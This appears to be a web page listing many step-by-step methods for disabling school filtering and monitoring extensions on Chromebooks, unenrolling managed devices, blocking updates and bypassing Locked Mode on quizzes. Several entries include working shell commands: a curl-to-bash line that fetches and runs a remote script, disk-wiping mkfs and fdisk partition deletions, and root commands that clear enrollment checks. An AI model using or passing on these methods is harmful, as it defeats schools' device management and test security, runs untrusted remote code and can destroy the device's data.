This page is for Google Chrome/Chrome OS bypasses
For Windows exploits, see Bypasser’s Windowskit
Most web-based exploits will work on other Chromium based browsers
proxy moment
Opens a proxy tab with about:blank cloaking.
Web-based exploit.
1: Make a bookmarklet with the link from xlak.github.io/alphabetic/ & run it.
2: Print the page (Ctrl+P), then cancel & click “try again”. A proxy tab will open.
AnyOSBlocksi;GoGuardian;Hapara;iBoss;SecurelyApp Diagnose Wi-Fi Bypass
Requires a app
a p p.
Chrome OS-based exploit.
1: Disable Wi-Fi.
2: Click "Sign in as Existing User".
3: Hold esc & click any app.
4: Click "Add Wi-Fi" & click any Wi-Fi.
5: Click "Diagnose" & go to Wi-Fi.
6: Click "Open in Settings", then close it.
7: Repeat step 2.
AnyWebBlocksi;GoGuardian;Hapara;iBoss;SecurelyExtensionDevModeBackAge
Requires Extension Dev Mode
Freezes extensions.
Web-based exploit.
1: Go to chrome://extensions & enable Extension Dev Mode.
2: Click on the background page of the extension you want to block, then "Network", "Disable Cache", & "No Throttling".
3: Go to Settings & click on the "Disable javascript" box. Keep this tab open.
4: Disable "No Throttling".
AnyOSBlocksi;GoGuardian;Hapara;iBoss;SecurelyDNSSettingsBaghdad
Requires access to DNS settings
Browse web from the sign-in screen.
Chrome OS-based exploit.
1: Sign out & click the settings button located at the top right of the Wi-Fi panel.
2: Set "Name servers" to "Custom name servers".
3: Set the first Custom name servers to 150.136.163.0.
You'll see a link on the normal sign-in screen that says "Visit this network's sign-in page".
4: Click on "Webview link for tests".
5: Click "Diagnose" & go to Wi-Fi.
AnyWebBlocksi;GoGuardian;Hapara;iBoss;SecurelyBuypass
Only lasts for 3 minutes.
Bypasses extensions for 3 minutes.
Web-based exploit.
1: Get the code from xlak.github.io/chaos/ & paste it in a new tab.
2: Inspect the page that loads.
3: Click on “Console” at the top & paste the script in.
4: When an inspect window pops up, paste the script in again.
AnyWebBlocksi;GoGuardian;Hapara;iBoss;SecurelyBookmarkletsCookie Dough
Requires bookmarklets
Creates a loop to screw over extensions.
Web-based exploit.
1: Run this bookmarklet on the blocked page of your extension.
AnyOSBlocksi;GoGuardian;Hapara;iBoss;SecurelyPowerwashCorkey
Requires powerwash.
Your extensions get corrupted & don't work.
Chrome OS-based exploit.
1: Powerwash your Chromebook.
2: Log into your Chromebook & immediately turn off Wi-Fi, then perform an instant restart (refresh+power).
3: Log back in & look for an option to log in as an existing user.
4: Go to chrome://extensions & turn on Wi-Fi.
5: Wait for your school’s blocking extension to appear. As soon as it does, turn off Wi-Fi & restart quickly.
6: Log back in, go back to extensions, & wait. If it says your blocking extension could be corrupted or doesn't appear at all, then it worked.
AnyOSBlocksi;GoGuardian;Hapara;iBoss;SecurelyPowerwashCrimson
Doesn't work with a force install list; requires powerwash
Corrupts extensions.
OS-based exploit.
1: Powerwash your Chromebook.
2: Login & immediately disable Wi-Fi.
3: Go to chrome://settings/syncSetup/advanced & click "Customize Sync".
4: Turn off sync for Extensions & everything else.
5: Save changes & enable Wi-Fi.
134WebBlocksi;GoGuardian;Hapara;iBoss;Securelychrome://extensionsDextensify
Memory leak unavoidable; patched on Chrome OS 135+
Disables extension with a memory leak.
Web-based exploit.
1: Go to chrome://extensions.
2: In a new tab, go to the settings page of the extension you want to disable.
3: In another tab, go here & click the “freeze extension button”.
4: Immediately switch back to chrome://extensions & spam the “allow access to file URLs” for a few seconds.
5: The extension is now disabled. You need to flip the switch a few times every couple of minutes, & you may need to reopen the Dextensify page every once in a while to prevent an unavoidable memory leak from crashing the system.
AnyWebBlocksi;GoGuardian;Hapara;iBoss;SecurelyBookmarkletsDisable Manager
Requires bookmarklets, Task Manager
Stop extensions form working with Task Manager & a bookmarklet.
Web-based exploit.
1: Open Task Manager & click on your blocker, then end its task.
2: Run either this or this bookmarklet on the newly unblocked page.
134WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyExtHang3r
Patched on Chrome OS 135+
Hangs extensions. Similar to Dexextensiify & LTMEAT Flood Method.
Web-based exploit.
1: Go here & follow the instructions.
134WebExtPrint3r
Patched on Chrome OS 135+
Allows toggling of forced extensions by printing iframes. Based off LTMEAT Print method.
Web-based exploit.
ExtPrint3r.mp4
1: Open this link.
2: Look for your blocker on the list. If it isn't there, toggle "show all extensions" in the settings.
3: Click disable & follow the directions on the popup window. You'll need to do it very quickly.
If the extension switches back on, increase the iframe slider in the settings.
AnyWebBlocksi;GoGuardian;Hapara;iBoss;SecurelyGoGuardian GoAway
1: Go here.
2: Reload the page.
3: If you are left on an error screen, go to chrome://restart.
AnyWebGoGuardianBookmarklets;TabLimitGuardianTabCrash
Requires tab limit.
Crashes the admin's ability to remove tabs, though they can still see your screen.
Web-based exploit.
1: Create a bookmarklet with this code.
2: Spam click the bookmarklet while holding Ctrl.
3: If you’re asked to close the page, click no & prevent the page from making additional dialogues.
AnyWebHapara;iBosschrome://net-internalsHSTS
Requires chrome://net-internals access.
Bypasses extensions that also use a Chrome app. Hapara & iBoss are known to work.
Web-based exploit.
1: Go to chrome://net-internals & click the "Domain Security Policy" tab.
2: Insert 127.0.0.1 in the "Add HSTS domain’s Domain" textbox, then click "Add".
3: Repeat step 2, but use "localhost" instead of 127.0.0.1.
4: Restart your computer.
If you have a force-installed extension & have a Chrome app from the same developer force-installed, it’s worth giving this a try.
AnyWebBlocksi;GoGuardian;Hapara;iBoss;SecurelyBookmarkletsHapara Focus Session Bypass
1: Create a bookmarklet with this code.
2: During a focus session, run the bookmarklet.
111OSBlocksi;GoGuardian;Hapara;iBoss;SecurelyKillcurly
Patched on Chrome OS 112+
Chrome OS-based exploit.
1: Go to sign out.
2: Press the big blue button.
3: Restart your Chromebook.
4: Add your school account back.
Incognito Exploit81OSBlocksi;GoGuardian;Hapara;iBoss;SecurelyInspectElementIncognito 81
Patched on Chrome OS 82+
Allows you to enter Incognito mode.
Web-based exploit.
1: Enter your username & password, but don't sign in.
2: Press Alt+Shift+I & spam the "Privacy Policy" for ~30-60 seconds.
3: Login, quickly go to the Incognito tab, then press Ctrl+Shift+N.
4: Close the original Incognito tab.
5: If it continues to open policy pages, repeat Step 4.
127OSBlocksi;GoGuardian;Hapara;iBoss;Securelychrome://flagsIncognito 123-127
Patched on Chrome OS 127+
Allows you to enter Incognito mode.
Web-based exploit.
1: Enable the chrome://flags/#captive-portal-popup-window flag (v123-125)/chrome://flags/#temporary-unexpire-flags-m124 (v126)/chrome://flags/#temporary-unexpire-flags-m125 (v126-127) flag & restart. If the flag didn't reset, continue.
2: In Wi-Fi Settings, set Name Servers to Custom Name Servers & the first box to detectportal.firefox.com/captive.apple.com/150.136.163.0 (any one of these).
3: Click sign-in on the popup, then press Ctrl+T.
4: Revert the change to Name Servers.
105WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyBookmarkletsIngot
Patched on Chrome OS 106+
A menu to disable extensions & enable extension Dev Mode. The successor UI to LTBEEF.
Web-based exploit.
1: Make a bookmarklet with this code.
2: Go to https://chrome.google.com/webstorex & run the bookmarklet.
AnyWebSecurelyINSECURELY
Patched on Securely versions above 2.98.55
A toggle that kills Securely using black magic.
Web-based exploit.
1: Go here & flip the switch.
110WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyBookmarkletsLoMoH
Doesn’t work with Hapara Highlights & Read&Write; patched on Chrome OS 111+
Uses locked mode to disable extensions. Formerly called Locked Mode Hack.
Web-based exploit.
1: Create a bookmarklet with this code & run it.
114WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyLTMEAT
Methods using (B) & (C) are patched on Chrome OS 115+ while the rest are patched on Chrome OS 135+
Crashes an extension's manifest file.
Web-based exploit.
Note: LTMEAT disables all extensions, not just your blocker.
Template URL: chrome-extension://ID/manifest.json
Extension IDs (Chrome):
Blocksi: pgmjaihnmedpcdkjcgigocogcbffgkbn
ContentKeeper: jdogphakondfdmcanpapfahkdomaicfa
Cisco Umbrella: jcdhmojfecjfmbdpchihbeilohgnbdci
Fortiguard: igbgpehnbmhgdgjbhkkpedommgmfbeao
GoGuardian: haldlgldplgnggkjaafhelgiaglafanh
Hapara: kbohafcopfpigkjdimdcdgenlhkmhbnc
iBoss: kmffehbidlalibfeklaefnckpidbodff
LANSchool: baleiojnjpgeojohhhfbichcodgljmnj
Linewize: ddfbkhpmcdbciejenfcolaaiebnjcbfc
NetRef: khfdeghnhlpdfeenmdofgcbilkngngcp
Securly: joflmkccibkooplaeoinecjbmdebglab
Smoothwall: jbldkhfglmgeihlcaeliadhipokhocnm
If your blocker ID isn’t on this list, go to the extension page & copy the character string in the URL.
LTMEAT.mp4
1: Take the Template URL & replace "ID" with the extension ID. This is the extension's manifest page.
2: Go to the extension’s manifest page & bookmark it (A), as well as chrome://kill (B) & chrome://hang (C).
3: While on (A), click on (B).
4: Instantly start spamming (C) & reload.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelySwitch Method
1: While on (A), click on (B).
2: Duplicate the tab.
3: Go to the extension’s settings page.
4: Flip the "Allow access to file URLs" switch.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyChat Method
1: Wait until your teacher opens the chat window.
2: Spam X until it stops opening.
3: Flip the “Allow access to file URLs” switch.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyTemporary Method
1: Create a new bookmark folder (spam.js) & inside that folder, make 38 bookmarks of the page chrome-extension://id/background.js (you can do this easily with the bookmark manager).
2: Go to chrome://settings/performance & turn memory saver off. Under “Keep these sites always active”, add chrome-extension://id/background.js.
3: On a new tab, right click (spam.js) & click “open all (38)”. Repeat this step, then duplicate the rightmost page & go to your blocker’s extension page..
4: Flip the “Allow access to file URLs” switch & go to the leftmost tab. Right click it & select “Close tabs to the right”. Keep the remaining background.js tab open.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelySkid Method
1: Go to (A) & click on (C).
2: Duplicate the tab (right click on it & click “duplicate”).
3: Go to your blocker’s extension page & flip the “Allow access to file URLs” switch.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyWeb Method
1: Go here & follow the instructions there.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyWi-Fi Method
1: Go to your blocker's extension page.
2: Disable Wi-Fi.
3: Spam the “Allow access to file URLs” switch.
4: Enable Wi-Fi.
5: Spam pin your extension.
WebBlocksi;GoGuardian;iBoss;SecurelyBookmarkletsPoint-Blank
N/A
Allows you to execute scripts using extensions, as well as hard & soft disable extensions.
Web-based exploit.
1: Create a bookmarklet with the code from here.
2: Go to one of these pages:
3: Click on the blue link & run the bookmarklet in the newly opened tab.
114WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyBookmarkletsQuickview
Requires bookmarklets; patched on Chrome OS 115+
Loads pages without extensions.
Web-based exploit.
1: Create a bookmarklet by dragging the box that says “Quickview Launcher” from here into the Bookmarks Bar.
2: On that same page, double click the opener.
3: On the newly opened tab, run the bookmarklet.
128WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyRigtools
Patched on Chrome OS 129+
Allows you to do a ton of things (with the right permissions).
Web-based exploit.
Rigtools.mp4
1: Keep this website open in a new tab.
2: Open this website & go to Network.
3: Double-click the black/grey box.
4: Click "extension-ID" & find your the extension ID of the extension you want to disable, then paste it in. It should load a filesystem: page. You can have other extensions under it.
5: Run this code. Note it won't work if your extension's manifest file doesn't have the proper permissions.
AnyWebBlocksi;GoGuardian;Hapara;iBoss;SecurelyBookmarkletsSidetracked
Requires flag access; only works on Chrome OS 106+
Uses the unblocked sidebar to browse the web.
Web-based exploit; Chrome OS exclusive.
1: Go to chrome://flags#search-web-in-side-panel & enable it, then restart.
2: Open the side panel & select “google.com” from the drop own list.
AnyWeb;Blocksi;GoGuardian;Hapara;iBoss;SecurelySigill
Requires an extension with a textbox
Hangs extensions.
Web-based exploit.
1: Download the index.html & emoji files.
2: Insert the emoji file into the HTML file.
3: Click "Copy to Clipboard".
4: In a textbox from the extension you want to disable, do paste & after a second, do it again.
5: Immediately after, open a page related to the extension (such as the manifest file) & keep it open.
118OSBlocksi;GoGuardian;Hapara;iBoss;SecurelyKioskSKIOVOX
Requires a kiosk app; Most methods patched on version 119
Opens a window inside of a kiosk app, which has different permissions & extensions.
Chrome OS-based exploit.
Skiovox.mp4
1: In the login screen, turn off your Wi-Fi.
2: If you have a password, type it in but don’t press enter.
3: Click on a kiosk app & press Alt+Shift+S instantly.
4: Wait until you get a “network unavailable screen”.
5: On the toolbar, click accessibility & then the ?.
If you see a “back” button proceed to method A (steps A-B), otherwise go to method B (steps C-E) or method C (steps F-H).
Method A:
A: Click “add other Wi-Fi network” & immediately press Esc twice & Enter. If you get a screen saying “multi sign-in is disab;ed”, press Esc to bypass it.
B: There may be an open window belonging to your school profile, you can close it. In the window behind it that has no extensions, click the 3 dots & then click “new window”. Use this window instead. Go to steps 14+.
Method B:
C: Press the “diagnose” button.
D: Just click “add other Wi-Fi network”. This is inconsistent, try a few times with a few apps or use steps 11-13.
E: Click Wi-Fi, then the settings link. Close this window to reveal a Chrome window. Go to steps 14+.
Method C:
F: Just click “add other Wi-Fi network”.
G: Turn on text-to-speech (Ctrl+Alt+Z). Hold the Search key & press O, then T.
H: Click “resources” & one of the 3 links to open Chrome. Once your browser is open, you can turn text to speech off. Go to steps 14+.
This exploit has some problems that can be fixed by the Skiovox Helper. A ZIP file of the extension is available on the GitHub page as well as here.
6: Go to chrome://extensions & enable extension Dev Mode. Click “load unpacked” & in the select a file menu, right click the ZIP file you downloaded earlier, & click “extract all”. Select the newly extracted folder to install the extension.
Other notes:
Problems without Skiovox Helper:
-Unclear how to add an account/install extensions.
-Keyboard shortcuts are broken.
-It’s hard to remove or resize windows.
-Can’t view battery percentage or time.
The main difference between the results of method A (steps A-B) than method B (steps C-E) or method C (steps F-H) is method A can open multiple windows, while the others can’t.
If your screen keeps falling asleep every 5 seconds, try a different kiosk app.
Your files, bookmarks, & history won’t transfer over to the exploit & vice versa.
To exit the exploit, either hold down your power button & sign out or type chrome://quit in a new tab.
OSBlocksi;GoGuardian;Hapara;iBoss;SecurelyKiosk125/126 Method
1: Do the main methods steps 1-4.
2: Click the cog in the brightness settings instead.
3: Click on one of the links in Chromevox's Resources tab (Ctrl+Alt+Z), then disable it.
4: Click "Sign in as existing user" & login. If you don't see this, try a different kiosk app.
5: Press Esc on the "Multi user sign in disabled on this Chromebook" screen.
6: Turn on Wi-Fi & open a new window.
7: Go to main method steps 6+.
Note that any Incognito window is still monitored by your school.
AnyWebBlocksi;GoGuardian;Hapara;iBoss;SecurelyExtensionAccessSOT
Requires extension access.
Uses OneTab & European witch magic to unblock websites.
Web-based exploit.
1: Download the OneTab extension.
2: Click the "import" button in the extension's settings tab.
3: Add the URL you wish to visit ~100 times, then click "import".
4: Spam click the top link, then either spam Esc on one of the opened tabs or wait for one to load on an about:blank page.
AnyOSSWAB
Requires Name Servers.
I don't know man but it gets you an unblocked browser.
OS-based exploit.
1: Sign out & go to the Wi-Fi Settings.
2: Go to Name Servers & set it to "Custom Name Servers", then set at least 1 box to "52.207.185.90". If itdoesn't automatically save, reconnect 1-3 times.
3: If you see a "Network not available" page, click "Sign in as an existing user" & then back until you reach the login screen.
4: Underneath there should be a "Sign in with Google account" button. Click it & then "Forgot Email?".
5: It should now show a 400 error page, click the Google logo.
AnyOS;ProxyBlocksi;GoGuardian;Hapara;iBoss;SecurelyDNSSettingsSwamp Launcher
Requires access to DNS settings
Connects you to a proxy server.
Chrome OS-based exploit.
1: Open the DNS settings.
2: Select "custom name servers" & set all of the boxes to 0.0.0.0.
3: Wait 5 seconds, then change them to 150.136.6.90.
4: In Google, go here.
5: Reload the page (Ctrl+Shift+R), then go here on the same tab.
6: Click on the big red triangle in the middle of the page & type "thisisunsafe". If you fail, reload the page & repeat this step.
7: Repeat step one & select "automatic name servers".
AnyWebBlocksi;iBossBookmarkletsuBoss
Exclusive to iBoss & Blocksi
Tampers with iBoss.
Web-based exploit.
1: Create a bookmarklet with this code.
2: Go to one of these URLs:
3: Run the code & follow the instructions.
AnyWebBlocksi;GoGuardian;Hapara;iBoss;SecurelyURL Unblocker
Requires editing to change website.
An unblocked alternative link.
Web-based exploit.
1: Take the URL of the site you want to visit & replace "URL" at the end of this.
2: Go to the URL.
AnyWeb;Blocksi;GoGuardian;Hapara;iBoss;SecurelyWindow of Opportunity
Patched on Chrome OS 135+
Gives a very brief window of time where websites will be unblocked.
Web-based exploit.
1: Go to your blocker's extension & flip the "Allow Access to File URLS" switch. You will have a very short window to access websites.
Miscellaneous AnyWebBookmarkletsBlank3r
about:blank
Allows you to run bookmarklets on privileged pages.
Web-based exploit.
Blank3r.mp4
1: Make a bookmarklet with this code.
2: Go to chrome://extensions & click on an extension.
3: Click “view in Chrome Web Store” & spam escape. If it loads into a blank screen, run the bookmarklet.
4: Keep this tab open.
124OS;UnenrollmentExternalStorageDeviceBadRecovery
Requires a storage device, another PC; patched on Chrome OS 125+ & kernver 4+
Chrome OS-based exploit.
BadRecovery.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4+, your Chromebook is unsupported.
3: Download a bin from chrome100.dev.
4: Go here & upload it, then flash it.
5: Enter Recovery Mode (Esc+Refresh+Power). If you're using the unverified payload, you must also enter developer mode, & then enter recovery mode again. On Cr50 devices, you must NOT be in developer mode for unenrollment to work.
6: Insert the storage device.
Mode Operations: AnyWebBlobe BM
Not compatable with every bookmarklet by design
Runs bookmarklets.
Web-based exploit.
1: Go here & follow the instructions.
AnyWebBlobBypass
1: Go to chrome://network#state.
2: Find the managed Wi-Fi under "Favorite Networks".
3: Click the "+" & copy all the text.
4: Go here & paste the test into the bar, then click "Download".
5: Go to chrome://network#general & import the ONC file.
131OS;UnenrollmentExternalStorageDeviceBR1CK
Certain boards are incompatible (see here); patched on Chrome OS 132+
Unenrolls your Chromebook.
OS-based exploit.
BR1CK.mp4
1: Powerwash (Esc+Power+Refresh then Ctrl+D) & return to Secure Mode.
2: Go to chrome://network#logs & check all boxes under the options section.
3: Place the combined-logs.tar.gz file in here. If you don't have access, the time will be ~1-1.5 seconds less than the time it takes to enroll.
4: Sign out & powerwash again, but use Ctrl+Alt+Shift+R instead.
5: When the "Enterprise Enrollment" screen appears, wait untul you're in the higher time range & perform an EC-Reset (Power+Refresh).
6: If you get a screen prompting you for recovery ("Chrome OS is missing or damaged" or "Something went wrong"), continue.
7: Preform SH1MMER Legacy.
A: While you're here, disable the 5 minute Dev Mode wait.
8: Select Deprovision (D), then type "B" to open a bash shell.
9: Run this command: "gsctool -a -o" & press the power button when it spams "Press PP button now!".
10: Reenter Dev Mode, then when the "Enterprise Enrollment" screen shows up again enter Recovery Mode & boot into SH1MMER.
11: Run deprovision (D) & then reboot (E).
AnyWebBookmarkletsCar Axle Client
Requires bookmarklets
A menu with games, exploits, & bookmarklets.
Web-based exploit.
1: Make a bookmark with the code from here & run it on any page.
This exploit was discovered by penguinify on GitHub.
127Webchrome://networkCAUB
Has to be done for each Wi-Fi network; patched on Chrome OS 128+
Prevents your Chromebook from automatically updating.
Web-based exploit.
CAUB.mp4
1: Go to chrome://network#state & scroll to the bottom.
2: Click the "+" by the name of the Wi-Fi network.
3: Copy the whole page (Ctrl+A then Ctrl+C).
4: Go to caub.glitch.me & paste it into the text box.
5: Click "generate onc" & download the file.
6: Go to chrome://network#general & import the onc file.
127Webchrome://networkFlag Method
Requires chrome://flags access; patched on Chrome OS 128+
Chrome OS-based exploit.
1: Go to chrome://flags#show-metered-toggle & enable it.
2: Open Settings & go to Network >> Your Wi-Fi >> Advanced >> Show metered toggle & turn it on.
AnyOSDevMode;ExternalStorageDeviceChriosk Dumping
Requires Crosh, Dev Mode
Dump any kiosk app & then make it a regular Chrome OS app.
Chrome OS-based exploit.
ChrioskDumping.mp4
1: Enable Dev Mode, then add your home & then your school account.
2: Open Crosh (Crtl+Alt+T) & run "shell", then go to "/home/chronos/{user account hash}/extentions/kiosk/" & find the ID of the kiosk app you want to dump.
TestNav: mdmkkicfmmkgmpkmkdikhlbggogpicma
SecureTestBrowser: hblfbmjdaalalhifaajnnodlkiloengc
NWEA: omkghcboodpimaoimdkmigofhjcpmpeb
CollegeBoard: joaneffahikmmipmidpkeedopejmhbbm
3: Back it up to your downloads folder by running "cp /home/chronos/{user account hash}/extentions/kiosk/(app ID) /home/chronos/{user account ID hash}/Downloads/".
4: Go into the folder & edit the "manifest.json" file. Delete the "kiosk_only" : true" line.
5: Load the folder with Extension Dev Mode in chrome://extensions (click "Load Unpacked").
119OS;UnenrollmentExternalStorageDeviceCryptosmite
Requires a storage device, another PC; patched on Chrome OS 120+
Unenrolls your Chromebook, removing ALL restrictions.
Just use SH1MMER Legacy.
Chrome OS-based exploit.
Cryptosmite.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 3+, your Chromebook is unsupported.
3: Downgrade to 118. If you're on a version before 118, stay on it.
4: Download an injected RMA Shim from here.
5: Flash the injected RMA Shim onto a USB device.
6: Enter Dev Mode (Ctrl+D).
7: Reenter Recovery Mode & plug in the storage device.
8: Run cryptosmite.sh in the injected shim.
9: In the "edit stateful bash" screen's bash prompt, run "tar -xvf /mnt/shim_stateful/stateful.tar.xz -C /mnt/stateful" & then "exit". The system will reboot into Verified Mode.
10: Click "Ok" in the oobe screen.
11: At the "Who would you like to add to this Chromebook?" screen, enable Dev Mode.
You can skip the wait by entering Recovery Mode & booting into the shim on the "Dev Mode is enabled" screen, then selecting the bash shell & running "mkfs.ext4 /dev/mmcblk0p1 -F", "mount -0 loop, rw /dev/mmcblk0p1 /tmp", "touch /tmp/.developer_mode", "umount /tmp && sync" & "Reboot". Add this as a bash script so you don't have to run these commands every time. On "enrollment" branch shims, this script is already included.
12: After enabling Dev Mode, press Ctrl+Alt+F2 quickly after you boot.
13: Type "Root", "vpd -i RW_VPD -s check_enrollment=0", & "cryptohome --action+remove_firmware_management_parameters". If you don't get the timing right, powerwash & try again.
After unenrolling, you can use KVS, which allows for use of newer versions of Chrome OS & more exploits.
AnyOSDAUB
Might not work
Prevents your Chromebook from automatically updating by deleting the update partitions. Also blocks kernver updates.
OS-based exploit.
DAUB.mp4
1: Access a shell (via methods such as SH1MMER or BadApple [see below]):
A: Enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked) & then reenter Recovery Mode.
B: Select "Internet Recovery" & reconnect to the same Wi-Fi network if needed.
C: When connected, press Ctrl+Alt+F3.
2: Run the following (3rd will open a prompt):
cgpt add /dev/mmcblk0 -i 2 -P 10 -T 5 -S 1
yes | mkfs.ext4 /dev/mmcblk0p1
fdisk /dev/mmcblk0
d
4
{just press enter}
d
5
{just press enter}
w
AnyOSExtensionAccess;ExternalStorageDevice;RecoveryModeDowngration
Requires a storage device; extension access required; Mostly Limited
Downgrade your Chromebook.
Chrome OS-based exploit.
Downgration.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 0 or 1, your Chromebook can downgrade to any version. Otherwise, it's limited.
Minimum versions:
0/1: N/A
2: 112
3: 120
4: 125
5: 132
3: Go to chrome://version & check your board (under platform).
4: Go to chrome100.dev & find your board (use Ctrl+F) or find the bins here.
5: Download the version of Chrome OS you want.
6: Install the Chromebook Recovery Utility extension & run it.
7: Plug in the storage device & follow the instructions.
8: On your Chromebook, enter Recovery Mode (Esc+Reload+Power) & follow the prompts.
9: Skip the "Checking for Updates" screen by pressing Ctrl+Shift+E.
129OS;UnenrollmentExternalStorageDevice;RecoveryModeE-Halcyon
Requires a storage device; patched on Chrome OS 130+
Boots into an unenrolled Chrome OS environment.
Chrome OS-based exploit.
E-Halcyon.mp4
1: Use SH1MMER & select "unenroll", even if it's patched.
2: Download a Chrome OS 107 bin from chrome100.dev & build inject it yourself or download one from here.
A: Open a terminal & run "git clone https://github.com/MercuryWorkshop/RecoMod", "cd RecoMod", "chmod +x recomod.sh", & "sudo ./recomod.sh -i /path/to/recovery/image.bin --halcyon --rw_legacy".
3: Flash it onto a storage device.
4: Enter Recovery Mode (Esc+Refresh+Power) & plug in the storage device.
5: Spam E until you get a 5 minute wait sequence, then spam E again near the end of it.
6: Navigate to "activate halycon enviroment" & press enter, then navigate to "install halycon semi-tethered". Navigate back to "activate halycon envirement" & select "Boot halycon semi-tethered".
You can no longer boot Chrome OS normally, & will have to use the storage device every time.
AnyWebBookmarkletsExtension Launcher
Doesn’t work with blocklist/banlist
Installs an extension without using the webstore.
Web-based exploit.
ExtensionLauncher.mp4
1: Make a bookmarklet with the code from here.
2: Go here & run the bookmarklet.
3: Find an extension you want to download.
4: Right-click the image to the left of the title & select "Copy image address". Paste the image address into the first bar.
5: Type the name of the extension into the second bar.
6: Copy the extension ID (string of random letters in the address bar). Paste it into the third bar.
7: Click "Download".
Visit the Extension Information page for information on some extensions.
125-129OS;UnenrollmentExternalPC;ExternalStorageDevice;Powerwash;RecoveryModeIcarus Lite
Requires a storage device, another PC; requires Chrome OS 125-129.
Unenrolls devices with device management interception using a proxy & a custom Certificate Authority.
Both devices should be on the same Wi-Fi network.
DO NOT USE PUBLIC ICARUS PROXIES.
Chrome OS-based exploit.
IcarusLite.mp4
1: On an external PC, clone the repo with "git clone --recursive https://github.com/cosmicdevv/Icarus-Lite.git" & change directory to it (cd Icarus-Lite).
2: Set up the environment. You can either run the following commands or the exe.
Nonkeyrolled
A: Check your Chromebook's board in chrome://version, then download a prebuilt bin here.
B: Flash it to an external storage device, enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked), then boot the shim.
Keyrolled
A: Enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked) & then reenter Recovery Mode.
B: Select "Internet Recovery" & reconnect to the same Wi-Fi network if needed.
C: When connected, press Ctrl+Alt+F3 & run "bash <(curl -SLk http://ba.cosmion.xyz/script)".
3: Reboot into Verified Mode & do not click continue. Open up the Network Configuration instead (bottom right corner).
4: Set the connection type to "Manual" & the "Secure HTTP" options to those given earlier, then click "Save" & continue the setup process.
AnyOSRecoveryModeKVS
Only works on unenrolled Chromebooks; requires a storage device
Switches your kernver.
Chrome OS-based exploit.
KVS.mp4
1: Unenroll your Chromebook.
3: Download a KVS bin from here.
4: Flash it onto a storage device.
5: Enter Dev Mode.
6: Reenter Recovery Mode.
7: Follow the instructions on-screen.
AnyWebLocked Mode X
Very buggy
Bypasses Google's Locked Mode.
Web-based exploit.
1: Open the locked form twice.
2: Click "Continue" on both at the exact same time. Using touchscreen will help a lot.
3: Click the Overview button (not Alt+Tab, that closes the quiz) on your keyboard.
Note you can't screenshot until the form has been submitted.
vAnyOSchrome://flagsNCOCrOS
Requires chrome://flags
Allows you to update your web browser separate from Chrome OS.
OS-based exploit.
1: Go to chrome://flags#lacros & enable it.
2: Restart your Chromebook.
AnyOSPowerwashRevertion
Requires powerwash
Reverts Chrome OS back to its previous version.
Chrome OS-based exploit.
1: Powerwash your Chromebook.
2: On the OOBE screen, press Ctrl+Shift+Alt+R twice.
3: Click "Powerwash & Revert".
AnyWebSearch Filter Bypass
doesn't do shit
Works around the set blocked pages.
Web-based "exploit".
1: Type what you want to search in the address bar & add enough bullshit, then press enter.
AnyOS;UnenrollmentExternalStorageDeviceSH1MMER AnyOS;UnenrollmentExternalStorageDeviceSH1MMER Legacy
Requires a storage device; patched on kernver 4+
Unenrolls your Chromebook, removing ALL restrictions.
Chrome OS-based exploit.
SH1MMERLegacy.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4 or more, your Chromebook is unsupported.
3: Find your Chromebook’s board name by going to chrome://version. It will be behind “stable-channel”.
4: Download your board's RMA Shim at chrome100.dev & then inject the bin at Wax4Web or download an injected bin from here.
5: Flash the injected bin onto an external storage device.
6: Enter Recovery Mode (Esc+Refresh+Power when booting), then press Ctrl+D & then enter.
7: Reenter Recovery Mode, then plug your shimmed storage medium into your Chromebook.
8: Play some Tetris. This is legally required.
9: Press "S" for Cyrptosmite. The decryption key is "Info-58-immense!NickName_Arabia-710".
10: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
AnyOS;UnenrollmentExternalStorageDeviceSH1MMER Modern
Requires a storage device; incompatible with Hanna/Coral boards; patched on Kernver 4+
Unenrolls your Chromebook, removing ALL restrictions.
Chrome OS-based exploit.
SH1MMERModern.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4 or more, your Chromebook is unsupported.
3: Find your Chromebook’s board name by going to chrome://version. It will be behind “stable-channel”.
4: Download your board's RMA Shim at chrome100.dev & then inject the bin at Wax4Web or download an injected bin from here.
5: Flash the injected ISO onto an external storage device.
6: Enter Recovery Mode (Esc+Refresh+Power when booting), then press Ctrl+D & then enter.
7: Reenter Recovery Mode, then plug your shimmed storage medium into your Chromebook.
8: Navigate the UI & select what option you want.
9: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
The fog...
Google has "patched" SH1MMER Modern on Chromebooks that have been on version 114+. However, there are extra steps to get it to work properly, as seen here. Unfortunately, they are quite hard & not for beginners.
DO NOT USE IT ON Ti50 CHIP DEVICES (CORSOLA & NISSA), IT WILL BRICK YOUR DEVICE.
Now that you're unenrolled, you won't have any kiosk apps. In order to get them back, you'll have to temporarily re-enroll your Chromebook.
1: Enter Dev Mode, then press Esc+Power+Reload then Ctrl+D & then enter.
2: If you get a screen that says "You're already in Dev Mode", skip it by pressing Ctrl+D again.
3: Powerwash your Chromebook (Ctrl+Alt+Shift+R). If you just entered Dev Mode, you can skip this step.
4: Once you enter the Wi-Fi password, click the "Enterprise Enrollment" button & sign in with your school account.
